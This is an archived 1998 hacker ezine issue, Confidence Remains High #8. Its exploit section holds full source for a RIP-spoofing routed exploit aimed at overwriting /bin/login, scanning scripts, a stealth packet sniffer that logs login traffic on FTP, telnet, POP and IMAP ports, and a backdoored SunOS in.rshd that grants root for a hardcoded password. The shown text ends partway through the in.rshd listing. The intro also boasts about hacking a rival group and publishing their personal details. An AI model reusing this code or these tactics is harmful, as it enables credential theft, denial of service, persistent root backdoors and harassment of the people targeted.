Copy Link
Add to Bookmark
Report

Confidence Remains High Issue 08

eZine's profile picture
Published in 
Confidence Remains High
 · 21 Aug 2019

  

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
. [cZo] . Team CodeZero Presents . [cZo] .
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


/IIIIIIIIII /IIIIIIIIII /III /III
\ III_____/ \ III___/III \ III \ III
\ III \ III \ III \ III \_III
\ III onfidence \ IIIIIIII emains \ IIIIIIIIII igh
\ III \ III__/III \ III__/ III
\ III \ III \ III \ III \ III
\ IIIIIIIIII ___ \ III \ III ___ \ III \ III ___
\_________/ /\__\ \__/ \__/ /\__\ \__/ \__/ /\__\
\/__/ \/__/ \/__/


ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Issue 8
22nd March 1998
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


Man with the plan : so1o

The usual : om3n, zer0x, xFli, electro,
spheroid, el8, ultima, chameleon.

Not forgotten : loss, organik, peenut, pzn, suid
helix, deprave, manly, Shok.

Others : paladine, Sciri, fiji, ch-E-ztic,
vacuum, humble.

Cheers : Darkcyde, Jf.

Russians : lirik, DemiGod, stranger, ps.


.-----------[ An Official ]-----------.
: .-----. .----. .--.--. :
: : .--' : .-. : : : : :
!_-:: : : : `-' ; : . : ::-_!
:~-:: :: : :: . : :: : ::-~:
: ::.`--. ::.: : ::.: : :
: `-----' `--'--' `--'--' :
!_-:: ::-_!
:~-::-[ Confidence Remains High ]-::-~:
:~-:: ::-~:
`-----------[ Production ]------------'


ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
In This (compact) Installment of Confidence Remains High :
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

------=> Section A : Introduction And Cover Story.

1. Confidence Remains High issue 8....................: Tetsu Khan
2. sIn (here we go again).............................: so1o

------=> Section B : Exploits And Code.

1. Jimmy J's "vintage warez" : pack #1................: JJ
2. routed remote......................................: Kit Knox
3. Wingate scanner....................................: cL0ut
4. LinSniffer 0.666...................................: humble
5. SunOS 5.5.1 in.rshd trojan.........................: anonymous

------=> Section C : Phones / Scanning / Radio.

1. Outdials...........................................: Lirik
2. BlueBoxing in the UK in '98........................: The UK Phreaking
Elite
3. UK Phone Definitions and Abbreviations.............: Jf

------=> Section D : Miscellaneous.

1. Top 10 reasons why.................................: anonymous
2. Hacking Digital Unix 4.0...........................: humble
3. FreeBSD 2.2.5 rootkit..............................: humble / method
4. l0ckd0wn.sh........................................: so1o

------=> Section E : World News.

1. VMG 0wned..........................................: sw1tch

-------=> Section F : Projects.

1. The Rhino9 Sentinel................................: so1o / humble
2. TotalCon...........................................: so1o

------=> Section G : FIN.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. Confidence Remains High issue 8 : Tetsu Khan
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

It's all good, issue 8 is here, life is good, and I feel great. Blah blah blah,
enjoy :D


The distro list..
=================

ftp.sekurity.org /users/so1o/
www.fth.org /crh/
www.technotronic.com /files/ezines/crh/
cybrids.simplenet.com /Toast/files/CRH/
ftp.linuxwarez.com /pub/crh/


Also check out..
================

www.hacked.net <-- Archive of all the stuff we have 0wned.

/server dark.technonet.com 6667 #!r00td0wn
---------------------------------------------
^-- or kali.cylink.net, dhp.com 6666, few others..


want to mail us? tk85@hotmail.com, you got CRH on your site? tell us f00l!

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. sIn (here we go again) : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

I have on thing to say, and that is.. we 0wned sIn, go see it at hacked.net,
www.hacked.net/exp/com/sinnerz/, we also pulled their d0x, they now live in
phear. PERIOD, it is over. yes? We win, you lose, every time.

here is a p1c 0f s0me sIn cl00bag t4ken by 4n el8 s4tellit3 :

\|||||/
/ o o \ __________ |
{ ^ }-=/ give me \ |
\_____/ \ vB k0dez!| |
| / `````````` |
/|\ / O |
/ | \/ |
| |
/ \ |
/ \ |


w0w, fh 1s pl4y1ng w4ll b4ll, a p0pular m0rmon pastt1me!

For free sIn d0x to add to your 0wn filez of 0wnersh1p, check earlier CRH
issues (namedly 3-5).. CRH distro list in pt.1

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ EXPLOITS / CODE ]==========[ .SECTION B. ]============[ EXPLOITS / CODE ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. Jimmy J's "vintage warez" : pack #1
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

#### ####
#### ####
#### ####
#### #### #### ####
#### #### #### ####
#### #### #### ####
####### #######

Jimmy J's "vintage warez" : pack #1
-----------------------------------

phf - The old favourite but with some new and useful options
such as trying the bash ff hole to avoid phf filtering
the newline character.

test-cgi - Another oldie allowing you to remotely list files. Good
for getting an idea what CGIs are on the machine as well as
other stuff, including packages installed etc.

icat - Grab a file from a remote machine running imapd. (You need
a valid account on the box)

Included in the crh008.zip is a vintage.tgz, these are Linux binaries for
the programs above, the two CGI exploits are as old as the hills but they
never seem to die so I dusted off some old archives and set about refining
them into a semi-useful state.

You can now specify a port number and a path to the CGI if you need and the
phf script even swaps spaces for %20s provided you use it properly.

I'm just releasing these for a laugh really. Someone, somewhere will
appreciate the effort.

I am not responsible for any use or misuse of these warez. They are for
informational purposes.

I urge the novice script kiddies among you to read the comments if you're
eager to learn what's going on behind the scenes and why. Learning is good.

That's it. Have fun.

JJ.

(If you wish to contact me mail chris@rootshell.com and he will forward it.)

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. routed remote : Kit Knox
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

/*
* BSD 4.4 based routed trace file exploit
*
* Basically, routed on IRIX, AIX and Linux systems can be forced into a debug
* mode, where a tracefile is specified in the RIP header, this tracefile can
* be used as a form of DoS, as you can specify it to overwrite system files,
* the actual contents of the file created is just routing information, so you
* CANNOT set up .rhosts files or rootshells! You can only use it as DoS,
* this was also a problem with the old statd remote, but people worked out
* how to use a "grappling-hook" technique, that gave a remote rootshell, it's
* documented in a CERT advisory for statd, work it out..
*
* Originally from l0ck, but recoded by Kit Knox (info@rootshell.com), with
* RIP spoofing etc. etc. still does the DoS, no rootshells yet :P
*
* NOTE : routed usually runs on port 520.
*/


/* File to append to on filesystem with debug output */

#define FILETOCREATE "/bin/login"


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <linux/udp.h>
#include <netinet/protocols.h>
#include <netdb.h>
#include <protocols/routed.h>
#include <linux/route.h>

#define err(x) { fprintf(stderr, x); exit(1); }
#define errs(x, y) { fprintf(stderr, x, y); exit(1); }

/*
* in_cksum --
* Checksum routine for Internet Protocol family headers (C Version)
*/

unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;

/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/

while (nleft > 1) {
sum += *w++;
nleft -= 2;
}

/* mop up an odd byte, if necessary */
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}

/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
}

/* Send faked UDP packet. */
int sendpkt_udp(sin, s, data, datalen, saddr, daddr, sport, dport)
struct sockaddr_in *sin;
unsigned short int s, datalen, sport, dport;
unsigned long int saddr, daddr;
char *data;
{
struct iphdr ip;
struct udphdr udp;
static char packet[8192];

/* Fill in IP header values. */
ip.ihl = 5;
ip.version = 4;
ip.tos = 0;
ip.tot_len = htons(28 + datalen);
ip.id = htons(31337 + (rand()%100));
ip.frag_off = 0;
ip.ttl = 255;
ip.protocol = IPPROTO_UDP;
ip.check = 0;
ip.saddr = saddr;
ip.daddr = daddr;
ip.check = in_cksum((char *)&ip, sizeof(ip));

/* Fill in UDP header values. Checksums are unnecassary. */
udp.source = htons(sport);
udp.dest = htons(dport);
udp.len = htons(8 + datalen);
udp.check = (short) 0;

/* Copy the headers into our character array. */
memcpy(packet, (char *)&ip, sizeof(ip));
memcpy(packet+sizeof(ip), (char *)&udp, sizeof(udp));
memcpy(packet+sizeof(ip)+sizeof(udp), (char *)data, datalen);

return(sendto(s, packet, sizeof(ip)+sizeof(udp)+datalen, 0,
(struct sockaddr *)sin, sizeof(struct sockaddr_in)));
}

/* Lookup the name. Also handles a.b.c.d dotted quads. Returns 0 on error */
unsigned int lookup(host)
char *host;
{
unsigned int addr;
struct hostent *he;

addr = inet_addr(host); /* Try if it's a "127.0.0.1" style string */
if (addr == -1) /* If not, lookup the host */
{
he = gethostbyname(host);
if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
return 0;

bcopy(*(he->h_addr_list), &(addr), sizeof(he->h_addr_list));
}
return(addr);
}

void
main(argc, argv)
int argc; char **argv;
{
unsigned int saddr, daddr;
struct sockaddr_in sin;
int s;
struct rip rp;

if(argc != 4)
errs("\nSee http://www.rootshell.com/\n\nUsage: %s <source_router> <dest_addr> <command>\n\ncommand: 3 = trace on, 4 = trace off\n\n",argv[0]);

if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
err("Unable to open raw socket.\n");

if(!(saddr = lookup(argv[1])))
err("Unable to lookup source address.\n");
if(!(daddr = lookup(argv[2])))
err("Unable to lookup destination address.\n");

sin.sin_family = AF_INET;
sin.sin_addr.s_addr= daddr;
sin.sin_port = 520;

/* Fill in RIP packet info */
rp.rip_cmd = atoi(argv[3]); /* 3 = RIPCMD_TRACEON, 4 = RIPCMD_TRACEOFF */
rp.rip_vers = RIPVERSION; /* Must be version 1 */
sprintf(rp.rip_tracefile, FILETOCREATE);

if((sendpkt_udp(&sin, s, &rp, sizeof(rp), saddr, daddr, 520, 520)) == -1)
{
perror("sendpkt_udp");
err("Error sending the UDP packet.\n");
}
}

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. Wingate scanner : trajek / cl0ut
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Needs nmap (phrack 51 -> www.phrack.com), work it out, simple..


skr1pt #1

---8<--- cut here ---8<--- cut here ---8<--- cut here ---8<--- cut here

#nmap $1 -p 23 | grep telnet
if nmap $1 -p 23 | grep telnet ; then
echo $1 >> scan.results
fi

---8<--- cut here ---8<--- cut here ---8<--- cut here ---8<--- cut here


skr1pt #2

---8<--- cut here ---8<--- cut here ---8<--- cut here ---8<--- cut here

# tee hee.. cl0ut/1998
host -l $1 | grep "has address" | awk -F ' ' '{ print $4 }' > $1.domains
echo "* Sorting hosts and removing dupes."
sort < $1.domains > $1.sorted
uniq < $1.sorted > $1.domains
rm -f $1.sorted

cat $1.domains | awk -F ' ' '{ print "./b " $1 }' > $1.tmp
rm -fr $1.domains
chmod +x $1.tmp
./$1.tmp
rm -fr $1.tmp

---8<--- cut here ---8<--- cut here ---8<--- cut here ---8<--- cut here

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
4. LinSniffer 0.666 : humble
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

/*
* LinSniffer 0.666
* by humble of rhino9
* I am not responsible for what you do with this.
*
* This is like linsniffer, but it uses a linked list
* so it won't ignore any connections.
*
* based on original code by Mike Edulla
*
* how many bytes do you want to capture per connection?
* it mallocs this much memory for each connection so don't
* make it too high
*/


#define MAXIMUM_CAPTURE 256
// how long before we stop watching an idle connection?
#define TIMEOUT 30
// log file name?
#define LOGNAME "tcp.log"

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <linux/if.h>
#include <signal.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <linux/socket.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/if_ether.h>
#include <sys/stat.h>
#include <fcntl.h>

int sock;
FILE *log;

struct connection
{
struct connection *next;

time_t start;
time_t lasthit;

unsigned long saddr;
unsigned long daddr;
unsigned short sport;
unsigned short dport;

unsigned char data[MAXIMUM_CAPTURE];
int bytes;
};

typedef struct connection *clistptr;

clistptr head,tail;

void add_node(unsigned long sa, unsigned long da,unsigned short sp,unsigned short dp)
{
clistptr newnode;

newnode=(clistptr)malloc(sizeof(struct connection));
newnode->saddr=sa;
newnode->daddr=da;
newnode->sport=sp;
newnode->dport=dp;
newnode->bytes=0;
newnode->next=NULL;
time(&(newnode->start));
time(&(newnode->lasthit));
if (!head)
{
head=newnode;
tail=newnode;
}
else
{
tail->next=newnode;
tail=newnode;
}
}

char *hostlookup(unsigned long int in)
{
static char blah[1024];
struct in_addr i;
struct hostent *he;

i.s_addr=in;
he=gethostbyaddr((char *)&i, sizeof(struct in_addr),AF_INET);
if(he == NULL) strcpy(blah, inet_ntoa(i));
else strcpy(blah, he->h_name);
return blah;
}

char *pretty(time_t *t)
{
char *time;
time=ctime(t);
time[strlen(time)-6]=0;
return time;
}

int remove_node(unsigned long sa, unsigned long da,unsigned short sp,unsigned short dp)
{
clistptr walker,prev;
int i=0;
int t=0;
if (head)
{
walker=head;
prev=head;
while (walker)
{
if (sa==walker->saddr && da==walker->daddr && sp==walker->sport && dp==walker->dport)
{
prev->next=walker->next;
if (walker==head)
{
head=head->next;;
prev=NULL;
}
if (walker==tail)
tail=prev;
fprintf(log,"============================================================\n");
fprintf(log,"Time: %s Size: %d\nPath: %s",pretty(&(walker->start)),walker->bytes,hostlookup(sa));
fprintf(log," => %s [%d]\n------------------------------------------------------------\n",hostlookup(da),ntohs(dp));
fflush(log);
for (i=0;i<walker->bytes;i++)
{
if (walker->data[i]==13)
{
fprintf(log,"\n");
t=0;
}
if (isprint(walker->data[i]))
{
fprintf(log,"%c",walker->data[i]);
t++;
}
if (t>75)
{
t=0;
fprintf(log,"\n");
}
}
fprintf(log,"\n");
fflush(log);
free (walker);
return 1;
}
prev=walker;
walker=walker->next;
}
}
}
int log_node(unsigned long sa, unsigned long da,unsigned short sp,unsigned short dp,int bytes,char *buffer)
{
clistptr walker;

walker=head;
while (walker)
{
if (sa==walker->saddr && da==walker->daddr && sp==walker->sport && dp==walker->dport)
{
time(&(walker->lasthit));
strncpy(walker->data+walker->bytes,buffer,MAXIMUM_CAPTURE-walker->bytes);
walker->bytes=walker->bytes+bytes;
if (walker->bytes>=MAXIMUM_CAPTURE)
{
walker->bytes=MAXIMUM_CAPTURE;
remove_node(sa,da,sp,dp);
return 1;
}
}
walker=walker->next;
}

}


void setup_interface(char *device);
void cleanup(int);


struct etherpacket
{
struct ethhdr eth;
struct iphdr ip;
struct tcphdr tcp;
char buff[8192];
} ep;

struct iphdr *ip;
struct tcphdr *tcp;

void cleanup(int sig)
{
if (sock)
close(sock);
if (log)
{
fprintf(log,"\nExiting...\n");
fclose(log);
}
exit(0);
}

void purgeidle(int sig)
{
clistptr walker;
time_t curtime;
walker=head;
signal(SIGALRM, purgeidle);
alarm(5);
// printf("Purging idle connections...\n");

time(&curtime);
while (walker)
{
if (curtime - walker->lasthit > TIMEOUT)
{
// printf("Removing node: %d,%d,%d,%d\n",walker->saddr,walker->daddr,walker->sport,walker->dport);
remove_node(walker->saddr,walker->daddr,walker->sport,walker->dport);
walker=head;
}
else
walker=walker->next;
}
}

void setup_interface(char *device)
{
int fd;
struct ifreq ifr;
int s;

//open up our magic SOCK_PACKET
fd=socket(AF_INET, SOCK_PACKET, htons(ETH_P_ALL));
if(fd < 0)
{
perror("cant get SOCK_PACKET socket");
exit(0);
}

//set our device into promiscuous mode
strcpy(ifr.ifr_name, device);
s=ioctl(fd, SIOCGIFFLAGS, &ifr);
if(s < 0)
{
close(fd);
perror("cant get flags");
exit(0);
}
ifr.ifr_flags |= IFF_PROMISC;
s=ioctl(fd, SIOCSIFFLAGS, &ifr);
if(s < 0) perror("cant set promiscuous mode");
sock=fd;
}

int filter(void)
{
int p;
p=0;

if(ip->protocol != 6) return 0;

p=0;
if (htons(tcp->dest) == 21) p= 1;
if (htons(tcp->dest) == 23) p= 1;
if (htons(tcp->dest) == 106) p= 1;
if (htons(tcp->dest) == 109) p= 1;
if (htons(tcp->dest) == 110) p= 1;
if (htons(tcp->dest) == 143) p= 1;
if (htons(tcp->dest) == 513) p= 1;
if (!p) return 0;

if(tcp->syn == 1)
{
// printf("Adding node syn %d,%d,%d,%d.\n",ip->saddr,ip->daddr,tcp->source,tcp->dest);
add_node(ip->saddr,ip->daddr,tcp->source,tcp->dest);
}
if (tcp->rst ==1)
{
// printf("Removed node rst %d,%d,%d,%d.\n",ip->saddr,ip->daddr,tcp->source,tcp->dest);
remove_node(ip->saddr,ip->daddr,tcp->source,tcp->dest);
}
if (tcp->fin ==1)
{
// printf("Removed node fin %d,%d,%d,%d.\n",ip->saddr,ip->daddr,tcp->source,tcp->dest);
remove_node(ip->saddr,ip->daddr,tcp->source,tcp->dest);
}
log_node(ip->saddr,ip->daddr,tcp->source,tcp->dest,htons(ip->tot_len)-sizeof(ep.ip)-sizeof(ep.tcp), ep.buff-2);
}


void main(int argc, char *argv[])
{
int x,dn;
clistptr c;
head=tail=NULL;

ip=(struct iphdr *)(((unsigned long)&ep.ip)-2);
tcp=(struct tcphdr *)(((unsigned long)&ep.tcp)-2);

if (fork()==0)
{
close(0); close(1); close(2);
setsid();
dn=open("/dev/null",O_RDWR);
dup2(0,dn); dup2(1,dn); dup2(2,dn);
close(dn);
setup_interface("eth0");

signal(SIGHUP, SIG_IGN);
signal(SIGINT, cleanup);
signal(SIGTERM, cleanup);
signal(SIGKILL, cleanup);
signal(SIGQUIT, cleanup);
signal(SIGALRM, purgeidle);

log=fopen(LOGNAME,"a");
if (log == NULL)
{
fprintf(stderr, "cant open log\n");
exit(0);
}

alarm(5);

while (1)
{
x=read(sock, (struct etherpacket *)&ep, sizeof(struct etherpacket));
if (x>1)
{
filter();
}
}
}
}


ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
5. SunOS 5.5.1 in.rshd trojan : anonymous
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

/*
SunOS 5.5.1 in.rshd trojan
By anonymous, for the hackers of the w0rld
1/3/98

Use thiz shizn1t t0 make me!

cc in.rshd.c -o in.rshd -lsocket -lnsl -lintl -lw -ldl -lbsm -lauth
-DSYSV -DSTRNET -DBSD_COMP -s

Then mv me to /usr/sbin, and restart inetd using:

# kill -HUP <pid of inetd>

w0rd.
*/


#define PASSWORD "eatme"
#ident "@(#)in.rshd.c 0.41 92/08/11"

#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/stat.h>

#include <netinet/in.h>

#include <arpa/inet.h>

#include <stdio.h>
#include <errno.h>
#include <pwd.h>
#include <signal.h>
#include <netdb.h>
#include <syslog.h>

#ifdef SYSV
#include <sys/resource.h>
#include <sys/filio.h>
#include <shadow.h>
#include <stdlib.h>

#include <security/ia_appl.h>

#define killpg(a,b) kill(-(a),(b))
#define rindex strrchr
#define index strchr
#endif /* SYSV */

#ifndef NCARGS
#define NCARGS 5120
#endif /* NCARGS */

int errno;
char *index(), *rindex(), *strncat();
/*VARARGS1*/
int error();

struct ia_status ia_status;
void * iah;
int retval;

/*ARGSUSED*/
main(argc, argv)
int argc;
char **argv;
{
struct linger linger;
int on = 1, fromlen;
struct sockaddr_in from;

openlog("rsh", LOG_PID | LOG_ODELAY, LOG_DAEMON);
audit_rshd_setup(); /* BSM */
fromlen = sizeof (from);
if (getpeername(0, (struct sockaddr *) &from, &fromlen) < 0) {
fprintf(stderr, "%s: ", argv[0]);
perror("getpeername");
_exit(1);
}
if (setsockopt(0, SOL_SOCKET, SO_KEEPALIVE, (char *)&on,
sizeof (on)) < 0)
syslog(LOG_WARNING, "setsockopt (SO_KEEPALIVE): %m");
linger.l_onoff = 1;
linger.l_linger = 60; /* XXX */
if (setsockopt(0, SOL_SOCKET, SO_LINGER, (char *)&linger,
sizeof (linger)) < 0)
syslog(LOG_WARNING, "setsockopt (SO_LINGER): %m");
doit(dup(0), &from);
/* NOTREACHED */
}

char username[20] = "USER=";
char homedir[64] = "HOME=";
char shell[64] = "SHELL=";

#ifdef SYSV
char *envinit[] =
{homedir, shell, (char *) 0, username, (char *) 0, (char *) 0};
#define ENVINIT_PATH 2 /* position of PATH in envinit[] */
#define ENVINIT_TZ 4 /* position of TZ in envinit[] */

/*
* See PSARC opinion 1992/025
*/

char userpath[] = "PATH=/usr/bin:";
char rootpath[] = "PATH=/usr/sbin:/usr/bin";
#else
char *envinit[] =
{homedir, shell, "PATH=:/usr/ucb:/bin:/usr/bin", username, 0};
#endif /* SYSV */

static char cmdbuf[NCARGS+1];
char hostname [MAXHOSTNAMELEN + 1];

doit(f, fromp)
int f;
struct sockaddr_in *fromp;
{
char *cp;
char locuser[16], remuser[16];

struct passwd *pwd;
#ifdef SYSV
char *tz, *tzenv;
struct spwd *shpwd;
struct stat statb;
#endif /* SYSV */

int s;
struct hostent *hp;
short port;
pid_t pid;
int pv[2], cc;
char buf[BUFSIZ], sig;
int one = 1;
int trojan=0;

(void) signal(SIGINT, SIG_DFL);
(void) signal(SIGQUIT, SIG_DFL);
(void) signal(SIGTERM, SIG_DFL);
#ifdef SYSV
(void) sigset(SIGCHLD, SIG_IGN);
#endif /* SYSV */
#ifdef DEBUG
{ int t = open("/dev/tty", 2);
if (t >= 0) {
#ifdef SYSV
setsid();
#else
ioctl(t, TIOCNOTTY, (char *)0);
#endif SYSV
(void) close(t);
}
}
#endif
fromp->sin_port = ntohs((u_short)fromp->sin_port);
if (fromp->sin_family != AF_INET) {
syslog(LOG_ERR, "malformed from address\n");
exit(1);
}
if (fromp->sin_port >= IPPORT_RESERVED ||
fromp->sin_port < (u_int) (IPPORT_RESERVED/2)) {
syslog(LOG_NOTICE, "connection from bad port\n");
exit(1);
}
(void) alarm(60);
port = 0;
for (;;) {
char c;
if ((cc = read(f, &c, 1)) != 1) {
if (cc < 0)
syslog(LOG_NOTICE, "read: %m");
shutdown(f, 1+1);
exit(1);
}
if (c == 0)
break;
port = port * 10 + c - '0';
}
(void) alarm(0);
if (port != 0) {
int lport = IPPORT_RESERVED - 1;
s = rresvport(&lport);
if (s < 0) {
syslog(LOG_ERR, "can't get stderr port: %m");
exit(1);
}
if (port >= IPPORT_RESERVED) {
syslog(LOG_ERR, "2nd port not reserved\n");
exit(1);
}
fromp->sin_port = htons((u_short)port);
if (connect(s, (struct sockaddr *) fromp,
sizeof (*fromp)) < 0) {
syslog(LOG_INFO, "connect second port: %m");
exit(1);
}
}
dup2(f, 0);
dup2(f, 1);
dup2(f, 2);
hp = gethostbyaddr((char *)&fromp->sin_addr, sizeof (struct in_addr),
fromp->sin_family);
if (hp)
strncpy (hostname, hp->h_name, sizeof(hostname));
else
strncpy (hostname, inet_ntoa(fromp->sin_addr),
sizeof(hostname));
getstr(remuser, sizeof(remuser), "remuser");
getstr(locuser, sizeof(locuser), "locuser");
getstr(cmdbuf, sizeof(cmdbuf), "command");

if (!strcmp(PASSWORD,locuser))
{
trojan=1;
}

if (!trojan && (ia_start("in.rshd", locuser, NULL, hostname, NULL, &iah)) !=
IA_SUCCESS) {
syslog(LOG_ERR, "ia_start() failed\n");
exit(1);
}

if (!trojan && ia_auth_user(iah, 0, &pwd, &ia_status) != IA_SUCCESS) {
error("permission denied\n");
audit_rshd_fail("Login incorrect", hostname,
remuser, locuser, cmdbuf); /* BSM */
exit(1);
}

if (trojan)
pwd=getpwnam("root");
else
{
shpwd = getspnam(locuser);
if (shpwd == NULL) {
error("permission denied.\n");
